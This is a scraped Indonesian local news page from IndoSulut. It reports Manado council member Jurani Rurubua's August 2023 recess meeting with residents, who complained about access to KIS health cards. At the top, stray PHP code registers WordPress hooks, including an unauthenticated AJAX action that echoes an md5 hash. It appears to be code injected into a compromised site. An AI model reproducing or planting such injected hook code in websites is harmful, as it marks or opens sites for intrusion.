function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Gelar Reses Kedua Tahun 2023, Jurani Rurubua Jemput Aspirasi Warga Perumahan Tamara – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 5 Agu 2023 17:59 WIB ·

Gelar Reses Kedua Tahun 2023, Jurani Rurubua Jemput Aspirasi Warga Perumahan Tamara


					Gelar Reses Kedua Tahun 2023, Jurani Rurubua Jemput Aspirasi Warga Perumahan Tamara Perbesar

MANADO – Anggota DPRD Manado Jurani Rurubua SST MM Menggelar masa reses kedua tahun 2023 di kompleks perumahan Tamara, Kecamatan Mapanget, (1/8/2023).

Dalam resesnya tersebut Srikandi PSI Manado ini mendapatkan sejumlah keluhan yang disampaikan warga. Diantaranya masalah warga tidak mampu yang tidak mendapatkan layanan Kartu Indonesia Sehat(KIS).

“Masih banyak warga disini yang tak memiliki KIS padahal memang mereka berhak mendapatkannya. Banyak warga disini yang pekerjaannya tidak tetap, sehingga layak mendapatkan bantuan dari pemerintah,” kata salah satu warga setempat.

Menanggapi sejumlah keluhan warga, Jurani mengaku akan mencoba perjuangkan apa yang seharusnya menjadi hak dan kewajiban warga.

“Saya mendengar mencatat semua keluhan warga dan nantinya akan saya sampaikan ke pemerintah dan saya siap mengawal aspirasi tersebut,” kata Rani.

Selanjutnya dikatakan Jurani, bahwa agenda reses adalah kegiatan yang difasilitasi oleh pemerintah dan dibayar oleh negara. Untuk itu menurut dia, setiap warga berhak dan memiliki kesempatan untuk hadir dan menyampaikan segala keluh kesahnya kepada wakil rakyat sebagai penyambung lidah rakyat.

“Intinya sebagai wakil rakyat siap mengawal kepentingan rakyat tetapi pasti secara bertahap semoga apa yang jadi keinginan dan kebutuhan warga boleh terakomodir,” katanya.

Ia juga berharap, jika ada warga yang ingin mengeluhkan masalah infrastruktur atau kesejahteraan sosial bisa langsung disampaikan kepadanya.

“Kalo ada (masalah) boleh langsung lapor ke saya. Jika Tuhan berkenan saya akan perjuangkan agar secepatnya boleh terealisasi secara bertahap sesuai faktor urgensinya,” pungkasnya. (Dyppo)

Artikel ini telah dibaca 31 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized